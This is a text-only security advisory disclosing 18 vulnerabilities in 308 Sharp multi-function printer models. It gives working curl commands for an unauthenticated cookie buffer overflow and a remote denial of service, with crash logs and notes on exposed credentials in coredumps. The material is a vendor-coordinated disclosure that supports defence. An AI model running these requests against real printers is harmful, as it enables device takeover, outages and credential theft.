Headline
Sharp Multi-Function Printer 18 Vulnerabilities
308 different models of Sharp Multi-Function Printers (MFP) are vulnerable to 18 different vulnerabilities including remote code execution, local file inclusion, credential disclosure, and more.
Hello,Please find a text-only version below sent to security mailing lists.The complete version on "17 vulnerabilities in Sharp Multi-FunctionPrinters" is posted here: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.htmlThe text version is also posted here: https://pierrekim.github.io/advisories/2024-sharp-mfp.txt=== text-version of the advisory ===-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512## Advisory InformationTitle: 17 vulnerabilities in Sharp Multi-Function PrintersAdvisory URL: https://pierrekim.github.io/advisories/2024-sharp-mfp.txtBlog URL: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.htmlDate published: 2024-06-27Vendors contacted: JPCERTRelease mode: ReleasedCVE: CVE-2024-28038, CVE-2024-36251, CVE-2024-28955, CVE-2024-29146,CVE-2024-29978, CVE-2024-32151, CVE-2024-33605, CVE-2024-33610,CVE-2024-33610, CVE-2024-35244, CVE-2024-33616, CVE-2024-34162,CVE-2024-36248## Product description> Multifunction printers offer more than just print. These devices integrate the power of a printer, photocopier and scanner into one single device.>> From https://www.sharp.co.uk/printers-photocopiers/explore-sharp-printers/sharp-multifunction-printers## Vulnerability SummaryVulnerable versions: 308 different models of Sharp Multi-FunctionPrinters (MFP) are vulnerable. It is recommended to visit the officialSharp advisory (https://global.sharp/products/copier/info/info_security_2024-05.html)and apply security patches and replace unsupported Multi-FunctionPrinters (MFP) models.The summary of the vulnerabilities is as follows:1. CVE-2024-28038 - Memory corruption in the main program - RemoteCode Execution against the web server without authentication2. CVE-2024-36251 - Invalid (0x000000d0) pointer dereference - RemoteDoS without authentication3. CVE-2024-28955, CVE-2024-29146, CVE-2024-29978, CVE-2024-32151 -World-readable coredump files and insecure storage of credentials4. CVE-2024-33605 - Arbitrary Directory Listing without authentication5. non-assigned CVE vulnerability - Local File Inclusion allowing toread any file (e.g. Coredump files) without authentication5.1 Generation of the coredump file on the printer5.2 Local File Inclusion of the coredump file5.3 Retrieve of credentials using the coredump files5.4 Retrieve of credentials using configuration files6. CVE-2024-33610 - Backdoor webpage - Listing of session cookieswithout authentication7. non-assigned CVE vulnerability - Configuration webpages reachablewithout authentication8. CVE-2024-33610 - Reboot without authentication - Remote DoS9. CVE-2024-35244 - Backdoor access - Service10. non-assigned CVE vulnerability - Backdoor access - FSS User11. non-assigned CVE vulnerability - Insecure default credentials12. CVE-2024-33616 - Read admin access on telnet13. non-assigned CVE vulnerability - XSS on all the Sharp printers (login.html)14. non-assigned CVE vulnerability - XSS on all the Sharp printers(all other HTML pages)15. CVE-2024-34162 - Exfiltration of LDAP credentials by downgradingthe security16. CVE-2024-36248 - Hardcoded Google API Keys17. non-assigned CVE vulnerability - Hardcoded Amazon API Keys18. N-day CVE-2022-45796 - Remote Code ExecutionTL;DR: An attacker can compromise Sharp Multi-Function Printers usingmultiple vulnerabilities.List of vulnerable models of Sharp Multi-Function Printers (308 models): BP-30C25, BP-30C25T, BP-30C25Y, BP-30C25Z, BP-30M35, BP-30M31,BP-30M28, BP-30M35T, BP-30M31T, BP-30M28T, BP-50C36, BP-50C31, BP-50C26, BP-50C65, BP-50C55, BP-50C45,BP-50M36, BP-50M31, BP-50M26, BP-50M55, BP-50M50, BP-50M45, BP-55C26, BP-60C45, BP-60C36, BP-60C31,BP-70C36, BP-70C31, BP-70C65, BP-70C55, BP-70C45, BP-70M36, BP-70M31, BP-70M65, BP-70M55, BP-70M45,BP-90C70, BP-90C80, BP-B547WD, BP-B537WR, BP-B550WD, BP-B540WR, BP-70M90, BP-70M75, MX-M1205, MX-M1055,DX-2500N, DX-2000U, MX-2010U, MX-1810U, MX-2314N, MX-2314NR, MX-2630N, MX-3050N A, MX-3050V A, MX-3100N,MX-3100G, MX-2600N, MX-2600G, MX-3101N, MX-2601N, MX-2301N, MX-3111U, MX-2310U, MX-2310R, MX-3115N,MX-2615N, MX-2615 A, MX-3116N, MX-2616N, MX-3551, MX-3051, MX-2651, MX-3570N, MX-3070N, MX-3570V, MX-3070V,MX-3571, MX-3071, MX-3571S, MX-3071S, MX-3610N, MX-3110N, MX-2610N, MX-3110N A, MX-3610NR,MX-3640N, MX-3140N, MX-2640N, MX-3140N A, MX-3640NR, MX-3140NR, MX-2640NR, MX-4050N, MX-3550N, MX-3050N,MX-4050V, MX-3550V, MX-3050V, MX-4060N, MX-3560N, MX-3060N, MX-4060V, MX-3560V, MX-3060V, MX-4061,MX-3561, MX-3061, MX-4061S, MX-3561S, MX-3061S, MX-5001N, MX-5000N, MX-4101N, MX-4100N, MX-5112N,MX-5111N, MX-5110N, MX-4112N, MX-4111N, MX-4110N, MX-5141N A, MX-4140N A, MX-5141N, MX-5140N, MX-4141N,MX-4140N, MX-6050N, MX-5050N, MX-6050V, MX-5050V, MX-6051, MX-5051, MX-4051, MX-6070N A, MX-4070N A,MX-3070N A, MX-6070N, MX-5070N, MX-4070N, MX-6070V A, MX-4070V A, MX-3070V A, MX-6070V, MX-5070V, MX-4070V,MX-6071, MX-5071, MX-4071, MX-6071S, MX-5071S, MX-4071S, MX-7040N, MX-6240N, MX-7500N, MX-6500N,MX-7580N, MX-6580N, MX-8081, MX-7081, MX-8090N, MX-7090N, MX-B400P, MX-B380P, MX-B401, MX-B381, MX-B402,MX-B382, MX-B402P, MX-B382P, MX-B402SC, MX-B382SC, MX-B455W, MX-B355W, MX-B455WT, MX-B355WT,MX-B455WZ, MX-B355WZ, MX-B456WH, MX-B356WH, MX-B456W, MX-B356W, MX-B476WH, MX-B376WH, MX-B476W, MX-B376W,MX-C301W, MX-C301, MX-C304, MX-C303, MX-C304WH, MX-C303WH, MX-C304W, MX-C303W, MX-C312, MX-C311,DX-C311, DX-C311J, MX-C310, DX-C310, MX-C381, DX-C381, MX-C380, MX-C381B, MX-C400P, MX-C380P, MX-C401,DX-C401, DX-C401 J, MX-C400, DX-C400, MX-C402SC, MX-C382SC, MX-C382SCB, MX-M1204, MX-M1054,MX-M904, MX-M1206, MX-M1056, MX-M2630, MX-M2630 A, MX-M266N, MX-M265N, MX-M265U, MX-M266NV, MX-M265NV,MX-M265UV, MX-M3050 A, MX-M314NV, MX-M264NV, MX-M315NE, MX-M265NE, MX-M315NE, MX-M265NE, MX-M315V, MX-M265V,MX-M354N, MX-M314N, MX-M264N, MX-M354NR, MX-M314NR, MX-M264NR, MX-M354U, MX-M314U, MX-M264U, MX-M3550,MX-M3050, MX-M3551, MX-M3051, MX-M2651, MX-M356N, MX-M316N, MX-M315N, MX-M356U, MX-M315U, MX-M356NV,MX-M316NV, MX-M315NV, MX-M356UV, MX-M315UV, MX-M3570, MX-M3070, MX-M3571, MX-M3071, MX-M3571S, MX-M3071S,MX-M465N A, MX-M365N A, MX-M503N, MX-M453N, MX-M363N, MX-M283N, MX-M503U, MX-M453U, MX-M363U, MX-M564N,MX-M464N, MX-M364N, MX-M564N A, MX-M565N, MX-M465N, MX-M365N, MX-M6050, MX-M5050, MX-M4050, MX-M6051,MX-M5051, MX-M4051, MX-M6070 A, MX-M4070 A, MX-M3070 A, MX-M6070, MX-M5070, MX-M4070, MX-M6071, MX-M5071,MX-M4071, MX-M6071S, MX-M5071S, MX-M4071S, MX-M753N, MX-M753U, MX-M623N, MX-M623U, MX-M754N, MX-M654N,MX-M754N A, MX-M654N A, MX-M7570, MX-M6570, MX-M905._Miscellaneous notes_:This security assessment was entirely done using a blackbox approachand fully-remote - I only had some IPs of printers (no physical accessand no credentials for admin or normal users). Consequently, thephysical security of the printers was not analyzed and thevulnerabilities were confirmed with about 15 different models runningthe latest firmware versions (MX-3060N, MX-3061, MX-3070N, MX-3560N,MX-3561, MX-5070V, MX-5071, MX-C3051R MX-C3081R, MX-M365N, MX-M453U,MX-M465N, MX-M5050, MX-M5051, MX-M6051 and MX-M6071).The vulnerabilities were communicated to JPCERT on June 1, 2023 andcommunications with JPCERT were very effective - they fully managedinteractions with Sharp._Impacts_An attacker can compromise Sharp multi-function printers (MFP) andexecute code. These printers are running Linux and are powerful. Theyare ideal to host implants (and fun programs, like Bettercap) and movelaterally inside infrastructures._Recommendations_- - Use network segmentation to isolate MFPs.- - Apply security patches.- - Replace unsupported MFPs.## Details - Memory corruption in the main program - Remote CodeExecution against the web server without authenticationBy Default, Sharp printers are using a single super-program that willrun as root and provide network daemons (ftp, http, snmp,raw-printer-9100, ...). This single program is vulnerable to astack-based buffer overflow without authentication.This `main` program runs as root and its HTTP stack is vulnerable,without authentication, to a stack-based buffer overflow, allowing anattacker to redirect the control flow of the program and achieveremote code execution.`main` program listening on port 80/tcp: sh-4.3# ps -auxww | grep main root 1186 6.3 5.3 2124656 172688 ? Sl 00:27 43:36/tmp/app/ui/ui_mainview -hidecursor root 2081 3.9 10.9 2515532 348980 ? Sl 00:27 26:52/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk root 13598 0.0 0.0 1980 368 pts/0 S+ 11:49 0:00 grep main sh-4.3# netstat -laputen | grep main tcp 0 0 0.0.0.0:50001 0.0.0.0:* LISTEN 0 10217 2081/main tcp6 0 0 :::443 :::* LISTEN 0 12538 2081/main tcp6 0 0 :::52000 :::* LISTEN 0 33214 2081/main tcp6 0 0 :::10080 :::* LISTEN 0 18542 2081/main tcp6 0 0 :::515 :::* LISTEN 0 10166 2081/main tcp6 0 0 :::53000 :::* LISTEN 0 12539 2081/main tcp6 0 0 :::10443 :::* LISTEN 0 18545 2081/main tcp6 0 0 :::5900 :::* LISTEN 0 33233 2081/main tcp6 0 0 :::9100 :::* LISTEN 0 12534 2081/main tcp6 0 0 :::80 :::* LISTEN 0 12537 2081/main tcp6 0 0 :::21 :::* LISTEN 0 10164 2081/main tcp6 0 0 :::631 :::* LISTEN 0 10168 2081/main udp 0 0 127.0.0.1:9473 0.0.0.0:* 0 13202 2081/main udp6 0 0 :::5353 :::* 0 12497 2081/main udp6 0 0 :::161 :::* 0 33229 2081/main udp6 0 0 :::546 :::* 0 33145 2081/main sh-4.3#By default, the printer will provide a MFPSESSIONID cookie whenreaching the printer with a browser as shown below. This cookie willthen be used for authentication purposes if the user decides to loginto the printer. For example, with a HTTP request to /main.html: kali% curl -kv http://10.0.0.1/main.html | head % Total % Received % Xferd Average Speed Time TimeTime Current Dload Upload Total SpentLeft Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:----:--:-- 0* Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /main.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > < HTTP/1.1 200 OK < Server: Rapid Logic/1.1 < MIME-version: 1.0 < Date: Thu Jan 1 02:32:35 1970 GMT < Content-Type: text/html; charset=UTF-8 < Transfer-Encoding: chunked < Connection: close < Pragma: no-cache < Cache-Control: no-cache < X-Frame-Options: DENY < Set-Cookie:MFPSESSIONID=020015D2C59E7B68C9FB5F411B0E59FCBEF70F7E03CEE4C4C5A12023051115051847BC555A < Extend-sharp-setting-status: 0 < { [2 bytes data] <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=320,initial-scale=1.0" /> <meta name="format-detection" content="telephone=no" /> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=10; IE=11" /> <title>Machine Identification - MX-M6071</title> <link rel="stylesheet" href="other.css" type="text/css" /> <link rel="stylesheet" href="color1.css" type="text/css" /> * Failure writing output to destination * Failed reading the chunked-encoded stream 100 6950 0 6950 0 0 196k 0 --:--:-- --:--:----:--:-- 199k * Closing connection 0 curl: (23) Failure writing output to destination kali%By sending a malicious HTTP request with a long MFPSESSIONID cookie,it is possible to overwrite the stack of the main program.This payload will send a MFPSESSIONID cookie with a payload of 643bytes. This payload will overwrite a stack buffer inside the mainprogram. The buffer is probably 639 bytes and `EDBB` will overwritethe stack: kali% var=`perl -e "print 'A'x639"`; curl -v -b"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB >If /system.html does not exist, it is possible to use /main.html orany existing html webpage instead: kali% var=`perl -e "print 'A'x639"`; curl -v -b"MFPSESSIONID=${var}EDCB" http://10.0.0.1/main.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB >If the first exploitation does not work, it is possible to resend itagain to overwrite the stack the second time: kali% var=`perl -e "print 'A'x639"`; curl -v -b"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB kali% var=`perl -e "print 'A'x639"`; curl -v -b"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCBThe `dmesg` output on the printer will confirm that the main programcrashed while trying to reach the address 0x42434445, corresponding tothe previous `EDCB` sent inside the cookie. `EDCB` is represented inthe little-endian format as ARM is little-endian and 0x42434445 can befound inside several registers (but not PC).output of `dmesg`: [ 127.970220] main[15612]: unhandled level 2 translation fault(11) at 0x42434445, esr 0x92000006 [ 127.979463] pgd = ffff80007a07e000 [ 127.982981] [42434445] *pgd=00000000fa099003,*pud=00000008c6f9d003, *pmd=0000000000000000 [ 127.992811] CPU: 1 PID: 15612 Comm: main Tainted: P O 4.1.46-rt52 #2 [ 128.000296] Hardware name: LS1043A MFP Board (DT) [ 128.005195] task: ffff8008372c69c0 ti: ffff80083dde0000task.ti: ffff80083dde0000 [ 128.012710] PC is at 0x20d4ff8 [ 128.015761] LR is at 0x2a0 [ 128.018465] pc : [<00000000020d4ff8>] lr : [<00000000000002a0>]pstate: 900f0010 [ 128.026024] sp : 000000008f12f7c0 [ 128.029335] x12: 0000000042434445 [ 128.032981] x11: 000000008fd45008 x10: 0000000000000001 [ 128.038298] x9 : 0000000091247bf8 x8 : 000000008fd5648c [ 128.043678] x7 : 0000000000000000 x6 : 000000008fd56c58 [ 128.048996] x5 : 000000008fd569bc x4 : 0000000008b90bdc [ 128.054388] x3 : 0000000042434445 x2 : 0000000042434445 [ 128.059834] x1 : 000000008fd569b8 x0 : 0000000000000001On the printer, using GDB, we will confirm the main program crashedand the stack has been successfully corrupted: sh-4.3# ps -auxww|grep main root 1186 9.7 4.9 2123632 158080 ? Sl 11:31 0:21/tmp/app/ui/ui_mainview -hidecursor root 2023 7.8 9.8 2505880 316360 ? Sl 11:31 0:15/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk root 26544 0.0 0.0 1980 376 pts/0 S+ 11:34 0:00 grep main sh-4.3# gdb -p 2023 GNU gdb (GDB) 7.10.1.20160210-cvs warning: File "/lib/libthread_db-1.0.so" auto-loading has beendeclined by your `auto-load safe-path' set to"$debugdir:$datadir/auto-load". warning: Unable to find libthread_db matching inferior's threadlibrary, thread debugging will not be available. 0xf744f1c4 in pthread_join () from /lib/libpthread.so.0 (gdb) c ... [LWP 32749 exited] [New LWP 32750] [New LWP 32751] [LWP 32751 exited] [New LWP 32752] ... [New LWP 27196] [LWP 27196 exited] [New LWP 27197] Program received signal SIGSEGV, Segmentation fault. [Switching to LWP 27195] 0x020d4ff8 in ?? () (gdb) bt #0 0x020d4ff8 in ?? () #1 0x000002a0 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) info reg r0 0x1 1 r1 0x903e0ec8 2419986120 r2 0x42434445 1111704645 r3 0x42434445 1111704645 r4 0x8b90bdc 146344924 r5 0x903e0ecc 2419986124 r6 0x903e1168 2419986792 r7 0x0 0 r8 0x903e082c 2419984428 r9 0x918ddcb8 2441993400 r10 0x1 1 r11 0x903db008 2419961864 r12 0x42434445 1111704645 sp 0x72231fc0 0x72231fc0 lr 0x2a0 672 pc 0x20d4ff8 0x20d4ff8 cpsr 0x90050010 -1878720496 (gdb) info frame Stack level 0, frame at 0x72231fc0: pc = 0x20d4ff8; saved pc = 0x2a0 called by frame at 0x72231fc0 Arglist at 0x72231fc0, args: Locals at 0x72231fc0, Previous frame's sp is 0x72231fc0 (gdb)There is no ASLR in the `main` program; the addresses are alwaysidentical therefore exploitation is very likely.Exploitation was not attempted since no enough time was allocated todevelop such exploit during this security assessment and I already hada remote shell as root on the printers. Sharp confirmed thatexploitation is possible.An attacker with a RCE vulnerability can then move laterally and useWifi to exfiltrate information: bash-4.3# iwlist ath0 scan ath0 Scan completed : Cell 01 - Address: 00:3C:10:01:02:03 ESSID:"[REDACTED]" Mode:Master Frequency:2.412 GHz (Channel 1) Quality=93/94 Signal level=-54 dBm Noise level=-95 dBm Encryption key:off Bit Rates:12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s; 48 Mb/s 54 Mb/s Extra:bcn_int=100 bash-4.3### Details - Invalid (0x000000d0) pointer dereference - Remote DoSwithout authenticationIt was observed that the `/billcodedef_sub_sel.html` webpage isreachable without authentication on Sharp printers. A specific requestto this webpage will trigger an invalid pointer deference in the mainprogram. The printer will then reboot after creating coredump files.[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]When submitting the request with the Sub Code `test` by pressing`Search Start(Q)`, the HTTP request will be:HTTP request using the HTML form from `billcodedef_sub_sel.html`:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]It is possible to modify the HTTP request to change`curr_page_url=%2Fbillcodedef_sub_sel.html` to`curr_page_url=%2Fbillcodedef_sub_sel.html?`. A question mark wasadded after `billcodedef_sub_sel.html`.The resulting request will be:[please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html][please use the HTML version athttps://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]The corresponding malicious HTTP request to trigger the DoS is: POST /billcodedef_sub_sel.html? HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 406 Origin: http://10.0.0.1 Connection: close Referer: http://10.0.0.1/billcodedef_sub_sel.html? Cookie: MFPSESSIONID=020035B15A47378CF80C6175263F714EEF9118E72A1AA6C9CAC6202305181146331E5FF54;sideBarflag=1 Upgrade-Insecure-Requests: 1 billing_code_def_selWebchg=&action=searchbtn&ordinate=0&token2=AEC039F52DC886D169AC7F977F61D4C61295539BC0A3572B08E37FB291B9A766E238FB699426F67B&ggt_textbox%288%29=test&ggt_textbox%2811%29=&ggt_select%2829%29=1&billing_radio=2%2C&BillingCode%282%2C%29=Not+Set&BillingCodeName%28%29=&ggt_hidden%2839%29=0&ggt_hidden%2840%29=1&ggt_hidden%2844%29=&curr_page_url=%2Fbillcodedef_sub_sel.html?&selBillingCodeName=We can also reproduce the issue using curl: kali% curl -i -s -k -X $'POST' -H $'Host: 10.0.0.1' --data-binary'curr_page_url=%2Fbillcodedef_sub_sel.html?''http://10.0.0.1/billcodedef_sub_sel.html'On the printer, we can see a crash: [ 9914.440518] main[18602]: unhandled level 3 translation fault(11) at 0x000000d0, esr 0x92000007 [ 9914.453538] pgd = ffff80082f408000 [ 9914.456936] [000000d0] *pgd=00000000f9ea6003,*pud=00000000f9f6e003, *pmd=00000000f9c0f003, *pte=0000000000000000 [ 9914.468751] CPU: 1 PID: 18602 Comm: main Tainted: P O 4.1.46-rt52 #2 [ 9914.476433] Hardware name: LS1043A MFP Board (DT) [ 9914.481138] task: ffff80083de6c680 ti: ffff80082cb20000task.ti: ffff80082cb20000 [ 9914.488691] PC is at 0x228fe6c [ 9914.491744] LR is at 0x228f820 [ 9914.494830] pc : [<000000000228fe6c>] lr : [<000000000228f820>]pstate: 600f0010 [ 9914.502227] sp : 000000007212fd70 [ 9914.505539] x12: 00000000ffffffff [ 9914.508939] x11: 000000007212fdb0 x10: 0000000000000001 [ 9914.514367] x9 : 0000000091170990 x8 : 0000000000000002 [ 9914.519683] x7 : 000000007212fd88 x6 : 0000000091172799 [ 9914.525102] x5 : 0000000000000000 x4 : 0000000000000000 [ 9914.530417] x3 : 0000000000000000 x2 : 000000007212fdd0 [ 9914.535764] x1 : 0000000000000061 x0 : 0000000000000000 [ 9914.543566] [BSPIF]bspif_pof_wait:signal receive(-512) [ 9914.548702] [BSPIF]bspif_pof_wait: [ 9988.116784] Panic : Oops Exit !!! [comm:irq/20-serial] [user_mode:0]With the creation of the corresponding coredump files: sh-4.3# cd /mnt/log && ls -latr [...] -rw-r--r-- 1 root root 19133981 May 18 11:48 core-main.log.gz.001 -rw-r--r-- 1 root root 0 May 18 11:48 ERR_IFS.log -rw-r--r-- 1 root root 19133981 May 18 11:48 ERR_core-main.log.gz -rw-r--r-- 1 root root 97230 May 18 11:48 ERR_kern.log -rw-r--r-- 1 root root 0 May 18 11:48 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 0 May 18 11:48 ERR_log_ui_mainview.log -rw-r--r-- 1 root root 21262 May 18 11:48 ERR_pdl.log -rw-r--r-- 1 root root 315 May 18 11:48 ERR_nf.log -rw-r--r-- 1 root root 314620 May 18 11:48 ERR_main.log -rw-r--r-- 1 root root 97363 May 18 11:48 kern.log.001 -rw-r--r-- 1 root root 18653 May 18 11:48 vmstat.log.001 -rw-r--r-- 1 root root 377 May 18 11:48 umount.log.001 -rw-r--r-- 1 root root 1861 May 18 11:48 slinkerr1.log -rw-r--r-- 1 root root 4582 May 18 11:48 slinkerr0.log -rw-r--r-- 1 root root 45625 May 18 11:48 watch_idle.log -rw-r--r-- 1 root root 314692 May 18 11:49 main.log -rw-r--r-- 1 root root 132 May 18 11:49 bsp.log -rw-r--r-- 1 root root 96435 May 18 11:49 kern.log -rw-r--r-- 1 root root 407 May 18 11:49 vmstat.log sh-4.3# date Thu May 18 11:50:40 UTC 2023 sh-4.3# uptime 11:51:55 up 3 min, 0 users, load average: 1.36, 0.95, 0.40 sh-4.3### Details - World-readable coredump files and insecure storage of credentialsIt was observed that the coredump files located in the Sharp printershave incorrect permissions. Any local user can read them. Thesecoredump files contain all the clear-text credentials of the users.Core files present in /mnt/log: sh-4.3# ls -la /mnt/log | grep core -rw-r--r-- 1 root root 16120921 May 11 15:18 ERR_core-main.log.gz -rw-r--r-- 1 root root 0 May 11 15:18 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-bcr_iface.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000SWOFF_core-bcr_iface.log.gz.001 -rw-r--r-- 1 root root 0 Jan 1 2000SWOFF_core-bcr_iface.log.gz.002 -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz -rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz.001 ... -rw-r--r-- 1 root root 0 Jan 1 2000 core-main.log.gz -rw-r--r-- 1 root root 16120921 May 11 15:18 core-main.log.gz.001 -rw-r--r-- 1 root root 13566117 May 11 15:16 core-main.log.gz.002 -rw-r--r-- 1 root root 17158453 May 11 15:12 core-main.log.gz.003 -rw-r--r-- 1 root root 17332354 